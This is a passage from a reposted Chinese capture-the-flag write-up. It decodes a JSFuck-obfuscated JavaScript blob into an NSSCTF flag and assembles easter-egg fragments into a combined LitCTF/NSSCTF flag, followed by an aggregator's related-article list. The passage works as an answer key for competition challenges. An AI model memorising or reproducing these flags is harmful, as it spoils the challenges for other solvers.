[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]]((+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+!+[]])+(![]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]])()())[!+[]+!+[]+!+[]+[+[]]]+(+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[+[]]]+[!+[]+!+[]+!+[]+!+[]]+[]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+[+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[]+[+[]]+[]+[+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+(![]+[])[+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[]+[+!+[]]+[]+[+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]]+[]+([][[]]+[])[!+[]+!+[]]+[+[]]+[]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+!+[]]+[]+([][[]]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[]+[+!+[]]+[]+(![]+[])[+!+[]]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+[+!+[]]+[]+[+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+(![]+[])[+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]]((+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+!+[]])

在线解密:http://www.hiencode.com/
找到jsfuck进行解密得到:NSSCTF{4[]b0[]8[]5[]0[]1[]6[]-8[]ace-4[]1[]0[]7[]-8[]4[]d0[]-1[]da4[]1[]ab1[]0[]8[]ba}

NSSCTF{4b085016-8ace-4107-84d0-1da41ab108ba}

0x0b、彩蛋【1+3+6+7四题拼接的flag】

第一题:
LitCTF{First_t0_The_k3y! (1/?)

第三题:
<?php // 第三个彩蛋!(看过头号玩家么?) // _R3ady_Pl4yer_000ne_ (3/?) ?>

第六题:
wow 你找到了第二个彩蛋哦~
_S0_ne3t? (2/?)

第七题:
这个好像是最后一个个彩蛋
F1rst_to_Th3_eggggggggg!}

拼接:
LitCTF{First_t0_The_k3y!_S0_ne3t?_R3ady_Pl4yer_000ne_F1rst_to_Th3_eggggggggg!}

注意:题目给的提交的格式是NSSCTF{},因此:
NSSCTF{First_t0_The_k3y!_S0_ne3t?_R3ady_Pl4yer_000ne_F1rst_to_Th3_eggggggggg!}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/524789.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

孙鑫VC++第一章 Windows内部运行原理

孙鑫VC++第一章 Windows内部运行原理

1. Windows应用程序&#xff0c;操作系统&#xff0c;计算机硬件之间的相互关系 1箭头表示操作系统控制输出设备2箭头表示操作系统可以得到输入设备信息3箭头表示应用程序通知操作系统执行具体操作 操作系统提供给应用程序的接口 API4箭头表示输入设备变化告诉应用程序 Window…
阅读更多...
线性表之双向链表(详解)

线性表之双向链表(详解)

&#x1f355;博客主页&#xff1a;️自信不孤单 &#x1f36c;文章专栏&#xff1a;数据结构与算法 &#x1f35a;代码仓库&#xff1a;破浪晓梦 &#x1f36d;欢迎关注&#xff1a;欢迎大家点赞收藏关注 文章目录 &#x1f365;前言&#x1f352;双向链表1. 带头双向循环链表…
阅读更多...
【C++】通序录管理系统

【C++】通序录管理系统

1、缘起 最近&#xff08;2023-04-24&#xff09;学习完了 C 编程语言的 基础语法&#xff0c;然后将这些基础语法的知识点整合到一起&#xff0c;实现一个 通讯录管理系统。以此来巩固以前所学习过的知识点&#xff0c;以求在后续的学习中能够灵活应用。 2、系统需求 通讯录是…
阅读更多...
ChatGPT结合本地数据_llamaindex

ChatGPT结合本地数据_llamaindex

1 功能 大模型学习的主要是通用数据&#xff0c;而用户可能需要让ChatGPT在本地的知识库中寻找答案。 普通用户不太可能训练大模型&#xff1b;由于本地数据格式丰富&#xff0c;内容烦多&#xff0c;且考虑到使用成本和token大小限制&#xff0c;也不可能在每次提问时都将所有…
阅读更多...
balenaEtcher v1.18.1 开源跨平台镜像文件快速刻录工具

balenaEtcher v1.18.1 开源跨平台镜像文件快速刻录工具

balenaEtcher 是一款开源免费的跨平台镜像文件快速刻录工具&#xff0c;使用体验感觉比软碟通UltraISO好用多了&#xff0c;推荐使用。它可以帮助用户快速将 ISO 文件、IMG 文件或者其他格式的镜像文件刻录到 USB 驱动器、SD 卡或者其他可烧录介质上。它支持 Windows、macOS 和…
阅读更多...
50 Projects 50 Days - Blurry Loading 学习记录

50 Projects 50 Days - Blurry Loading 学习记录

项目地址 Blurry Loading 展示效果 Blurry Loading 实现思路 元素组成只需要有一张图片和中间的文本即可。针对动态过程分析初始和终止状态即可&#xff0c;初始时图片全模糊&#xff0c;文本显示0%&#xff1b;终止时&#xff0c;图片完全不模糊&#xff0c;文本会显示100…
阅读更多...
Junit 单元测试框架(简单使用)

Junit 单元测试框架(简单使用)

目录 一、注解 1. Test 2. BeforeEach 和 BeforeAll 3. AfterEach 和 AfterAll 二、断言 1. Assertions类 1.1 assertEquals 和 assertNotEquals 1.2 assertTrue 和 assertFalse 1.3 assertNull 和 assertNotNull 三、用例执行顺序 1. 方法的排序 —— Order 四、…
阅读更多...
人工智能轨道交通行业周刊-第44期(2023.5.8-5.14)

人工智能轨道交通行业周刊-第44期(2023.5.8-5.14)

本期关键词&#xff1a;智能列控、苏州城轨智慧大脑、智慧乘务系统、深铁智慧运维、铁路遥感、3D视觉 1 整理涉及公众号名单 1.1 行业类 RT轨道交通人民铁道世界轨道交通资讯网铁路信号技术交流北京铁路轨道交通网上榜铁路视点ITS World轨道交通联盟VSTR铁路与城市轨道交通R…
阅读更多...
【C++入门攻略】和【编程常见问题】

【C++入门攻略】和【编程常见问题】

常见问题 vsstudio快捷键 快速注释组合键 ctrlk ctrlc 取消注释快捷键 ctrlk ctrl u 支持垃圾回收机制 大多数面向对象编程语言具有垃圾回收机制。早期的C语言不具备垃圾回收机制&#xff0c;这意味着申请的内存资源在使用完成后&#xff0c;需要程序员自己释放。直到C11标…
阅读更多...
1066 Root of AVL Tree(51行代码+超详细注释)

1066 Root of AVL Tree(51行代码+超详细注释)

分数 25 全屏浏览题目 切换布局 作者 CHEN, Yue 单位 浙江大学 An AVL tree is a self-balancing binary search tree. In an AVL tree, the heights of the two child subtrees of any node differ by at most one; if at any time they differ by more than one, rebala…
阅读更多...
孙鑫VC++第一章 Windows程序内部运行机制

孙鑫VC++第一章 Windows程序内部运行机制

目录 1.1 API和SDK 1.2 窗口和句柄 1.3 消息和队列 1.4 WinMain 1.4.1 WinMain函数的定义 1.4.2 窗口的创建 1.4.3 消息循环 1.4.4 窗口过程函数 1.1 API和SDK API:Windows操作系统提供给应用程序编程的接口。 SDK&#xff08;软件开发包&#xff09;:用于开发的所有资…
阅读更多...
swing列表框_强制存储的DefaultListModel和DefaultComboBoxModel

swing列表框_强制存储的DefaultListModel和DefaultComboBoxModel

package com.aynu.layout;import javax.swing.*; import java.awt.BorderLayout; import java.awt.event.ActionEvent; import java.awt.event.ActionListener;public class DefaultListModelTest {JFrame jf new JFrame("测试DefaultListModel");JTextField bookNa…
阅读更多...
JVM学习(二)

JVM学习(二)

1. JVM 运行时内存 Java 堆从 GC 的角度还可以细分为: 新生代 ( Eden 区 、 From Survivor 区 和 To Survivor 区 )和 老年 代。 1.1. 新生代 是用来存放新生的对象。一般占据堆的 1/3 空间。由于频繁创建对象&#xff0c;所以新生代会频繁触发 MinorGC 进行垃圾回收。新…
阅读更多...
《如何评价北化面向对象江某英之我是传奇》

《如何评价北化面向对象江某英之我是传奇》

点进来的都是家人了&#xff0c;来&#xff0c;今天带你们一起速通江某英的面向对象。 首先&#xff0c;我们先看一下江某英的教学安排&#xff0c;所谓知己知彼&#xff0c;百战不殆。 一共是九个章节&#xff0c;但是最后一个总复习没讲&#xff0c;这不是为难我们吗&#x…
阅读更多...
【移动端网页布局】Flex 弹性布局案例 ② ( 顶部固定定位搜索栏 | 固定定位盒子居中对齐 | 二倍精灵图设置 | CSS3 中的垂直居中对齐 )

【移动端网页布局】Flex 弹性布局案例 ② ( 顶部固定定位搜索栏 | 固定定位盒子居中对齐 | 二倍精灵图设置 | CSS3 中的垂直居中对齐 )

文章目录 一、顶部固定定位搜索栏1、固定定位盒子居中对齐2、设置最大宽度和最小宽度3、使用 Flex 弹性布局管理宽度4、二倍精灵图设置5、CSS3 中的垂直居中对齐 - 行高 内容高度 ( 总高度 - 边框高度 - 内边距高度 ) 二、代码示例1、HTML 标签结构2、CSS 样式3、展示效果 一、…
阅读更多...
Pytroch nn.Unfold() 与 nn.Fold()图码详解

Pytroch nn.Unfold() 与 nn.Fold()图码详解

文章目录 Unfold()与Fold()的用途nn.Unfold()Unfold()与Fold() 变化模式图解 nn.Fold()单通道 滑动窗口无重叠模拟图片数据&#xff08;b,3,9,9&#xff09;&#xff0c;通道数 C 为3&#xff0c;滑动窗口无重叠。单通道 滑动窗口有重叠。 卷积等价于&#xff1a;Unfold Matri…
阅读更多...
国民技术N32G430开发笔记(20)- FreeRTOS的移植

国民技术N32G430开发笔记(20)- FreeRTOS的移植

FreeRTOS的移植 1、官网下载FreeRTOSv202212.01&#xff0c;搜索官网下载即可。 2、新建一个FreeRTOSDemo的工程&#xff0c;可以把之前的工程中的Bootloader工程复制一份。 3、打开下载的freertos代码将相应代码移植到我们的工程中。 protable文件夹&#xff0c;因为是gcc环…
阅读更多...
ChatGPT国内镜像网站集合

ChatGPT国内镜像网站集合

ChatGPT是一个基于人工智能的聊天机器人&#xff0c;它可以与用户进行自然语言交互。ChatGPT使用了最新的自然语言处理技术&#xff0c;包括深度学习和神经网络&#xff0c;以便更好地理解用户的意图和回答用户的问题。 ChatGPT可以回答各种问题&#xff0c;包括但不限于常见问…
阅读更多...
RabbitMQ如何避免丢失消息

RabbitMQ如何避免丢失消息

目录标题 消息丢失1. 生产者生产消息到RabbitMQ Server 消息丢失场景1. 网络问题2. 代码层面&#xff0c;配置层面&#xff0c;考虑不全导致消息丢失解决方案&#xff1a;开启confirm模式 2. 队列本身可能丢失消息1. 消息未完全持久化&#xff0c;当机器重启后&#xff0c;消息…
阅读更多...
shell脚本之“sed“命令

shell脚本之“sed“命令

文章目录 1.sed编辑器概述2.sed命令常用选项3.sed命令常用操作4.sed命令演示操作部分5.总结 1.sed编辑器概述 sed是一种流编辑器&#xff0c;流编辑器会在编辑器处理数据之前基于预先提供的一组规则来编辑数据流。 sed编辑器可以根据命令来处理数据流中的数据&#xff0c;这些…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023